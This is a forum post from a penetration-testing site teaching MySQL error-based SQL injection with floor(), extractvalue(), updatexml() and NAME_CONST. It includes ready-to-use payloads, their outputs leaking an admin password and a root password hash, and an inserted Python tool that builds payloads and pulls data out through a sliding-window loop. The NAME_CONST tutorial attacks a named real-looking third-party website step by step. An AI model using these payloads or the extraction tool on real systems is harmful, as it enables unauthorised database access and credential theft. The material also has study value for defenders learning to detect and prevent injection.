China Network Penetration Testing Alliance

Title: MySQL error-based injection: three exploitation techniques using floor, ExtractValue and UpdateXml

Author: admin    Time: 2015-11-11 19:03

1. Error-based injection via floor()

Payloads such as the following can be used (the second one builds its own three-row derived table with a UNION instead of relying on information_schema.tables):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message (the trailing 1 is the floor(rand(0)*2) value, not part of the data). This works because rand(0) is seeded and therefore deterministic, and GROUP BY evaluates its key expression more than once while filling the temporary table: when the key changes between the lookup and the insert, the same group key is stored twice and the unique index 'group_key' rejects it. The derived table needs at least three rows for the collision to occur, which information_schema.tables always provides. The value shown in the message is truncated to 64 characters, so longer values have to be read in slices with mid() or substr(). To extract other data, replace version() with the desired subquery.
For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

The password is admin888; again the final 1 comes from floor(rand(0)*2).
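Why the floor() technique in section 1 errors out, as an added example that is not part of the original post: the script below models MySQL's RAND(N) generator and the two evaluations GROUP BY performs on a volatile key. The generator follows the my_rnd() linear congruential generator as seeded by RAND(0); that is an assumption taken from the server source, so confirm it with `select floor(rand(0)*2) from information_schema.tables limit 6` on a real server before relying on the exact sequence. The simulated table and the version string are constructed for the demo.

```python
# Added example: models why `concat(data, floor(rand(0)*2))` used as a GROUP BY
# key produces "Duplicate entry ... for key 'group_key'". Not code from the post.

MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()

def mysql_rand(seed):
    """Generator reproducing MySQL RAND(seed). Assumption: seeding as in
    Item_func_rand::seed_random() and stepping as in my_rnd(); confirm
    against a real server before relying on the exact sequence."""
    seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
    seed2 = (seed * 0x10000001) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE

def floor_rand0_sequence(n):
    """The first n values of floor(rand(0)*2)."""
    gen = mysql_rand(0)
    return [int(next(gen) * 2) for _ in range(n)]

class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062."""

def simulate_group_by(row_count, data="5.1.33-community-log"):
    """Simulate `select count(*) from T group by concat(data, floor(rand(0)*2))`
    over a table of `row_count` rows.  The server evaluates the key once to
    look the group up in its temporary table and, on a miss, once more when it
    inserts the new group; with a volatile key the two evaluations can differ."""
    gen = mysql_rand(0)
    next_key = lambda: "%s%d" % (data, int(next(gen) * 2))
    groups = {}
    for _ in range(row_count):
        probe = next_key()            # evaluation 1: lookup in the temp table
        if probe in groups:
            groups[probe] += 1
            continue
        stored = next_key()           # evaluation 2: the key actually inserted
        if stored in groups:          # group_key is unique: this is error 1062
            raise DuplicateEntry("Duplicate entry '%s' for key 'group_key'" % stored)
        groups[stored] = 1
    return groups

if __name__ == "__main__":
    print(floor_rand0_sequence(6))          # [0, 1, 1, 0, 1, 1]
    print(simulate_group_by(2))             # {'5.1.33-community-log1': 2}
    try:
        simulate_group_by(3)
    except DuplicateEntry as err:
        print(err)                          # same message as the ERROR 1062 shown above
```

With two rows the temporary table ends up holding a single group. The third row probes with key `...0`, misses, re-evaluates the key to `...1` for the insert and collides with the existing group. That is why the derived table needs at least three rows and why the leaked string always carries the extra trailing digit.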

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

The second argument of extractvalue() must be a valid XPath expression. A string that starts with 0x5c (a backslash) is not, so the server rejects it and echoes the string back in the error message. The message shows at most 32 characters, so longer values must be read in slices with mid() or substr().

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

updatexml() parses its second argument as XPath in the same way, so the same 32-character limit applies; here 0x3a (a colon) is the invalid leading character.

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
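The three techniques above leak data through an error message that is truncated (64 characters for floor(), 32 for extractvalue()/updatexml()), so in practice the value is read window by window and parsed out of the response. The following is an added example, not code from the original post: payload builders for the floor() and XPath variants, one parser that understands all the error formats shown on this page (including the "Duplicate column name" message of the NAME_CONST material further down), and a sliding-window extraction loop. `make_fake_target()` and the secret it serves are constructed stand-ins for an injectable page; a real run would send each payload over HTTP and return the response body.

```python
import re

# Added example, not part of the original post.
XPATH_LIMIT = 32   # chars shown by "XPATH syntax error: '...'"
FLOOR_LIMIT = 64   # chars shown by "Duplicate entry '...' for key 'group_key'"

def floor_payload(expr, rows="information_schema.tables"):
    """floor() variant; `rows` must name a table with at least three rows."""
    return ("and (select 1 from (select count(*),concat((%s),floor(rand(0)*2))x "
            "from %s group by x)a)" % (expr, rows))

def xpath_payload(expr, offset=1, func="extractvalue"):
    """extractvalue()/updatexml() variant reading one window of `expr`.
    0x7e ('~') is the invalid leading XPath character; it costs one of the
    32 visible characters, hence windows of 31 data characters."""
    window = XPATH_LIMIT - 1
    inner = "concat(0x7e,mid((%s),%d,%d))" % (expr, offset, window)
    if func == "extractvalue":
        return "and extractvalue(1,%s)" % inner
    if func == "updatexml":
        return "and updatexml(1,%s,1)" % inner
    raise ValueError("unknown function %r" % func)

# One regex per error format, each taken from the messages shown on this page.
LEAK_PATTERNS = (
    # floor(): the trailing 0/1 is the floor(rand(0)*2) value, not data
    re.compile(r"Duplicate entry '(.*?)[01]' for key '<?group_key>?'"),
    # extractvalue()/updatexml(): the leading separator is \, : or ~
    re.compile(r"XPATH syntax error: '[\\:~](.*?)'"),
    # name_const(): two identically named derived-table columns
    re.compile(r"Duplicate column name '(.*?)'"),
)

def parse_leak(response):
    """Return the leaked string from a response body, or None if no error is present."""
    for pattern in LEAK_PATTERNS:
        m = pattern.search(response)
        if m:
            return m.group(1)
    return None

def extract(send, expr, func="extractvalue"):
    """Read a value longer than one window by sliding mid() over it.
    `send` takes a payload string and returns the response body."""
    window = XPATH_LIMIT - 1
    result, offset = "", 1
    while True:
        piece = parse_leak(send(xpath_payload(expr, offset, func)))
        if not piece:            # no error at all, or an empty window past the end
            break
        result += piece
        if len(piece) < window:  # a short window was the last slice
            break
        offset += window
    return result

def make_fake_target(secret):
    """Constructed stand-in for the injectable page: answers with the MySQL
    XPATH error for whichever mid() window the payload asks for."""
    def fake_target(payload):
        m = re.search(r"mid\(\(.*\),(\d+),(\d+)\)", payload)
        start, length = int(m.group(1)), int(m.group(2))
        return "ERROR 1105 (HY000): XPATH syntax error: '~%s'" % secret[start - 1:start - 1 + length]
    return fake_target

# 45-character value, built from the hash shown on this page, so it spans two windows
SECRET = "root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82"

if __name__ == "__main__":
    target = make_fake_target(SECRET)
    print(extract(target, "select concat(user,password) from mysql.user limit 0,1"))
```

The loop stops either when the response carries no recognisable error (the injection point is gone or the expression failed) or when a window comes back shorter than 31 characters; a value whose length is an exact multiple of 31 simply yields one extra empty window, which the same check handles.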

Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Here the leak comes from joining two derived tables whose single column carries the same name, which name_const() sets to the value being extracted. Note that later MySQL releases enforce the requirement that name_const() arguments be constants and answer a subquery argument with "Incorrect arguments to NAME_CONST", so the data-extraction form only works on older builds; the @@version form still works because a system variable counts as a constant.

Error-based injection on newer MySQL versions: exploiting NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(name, value)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.

Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2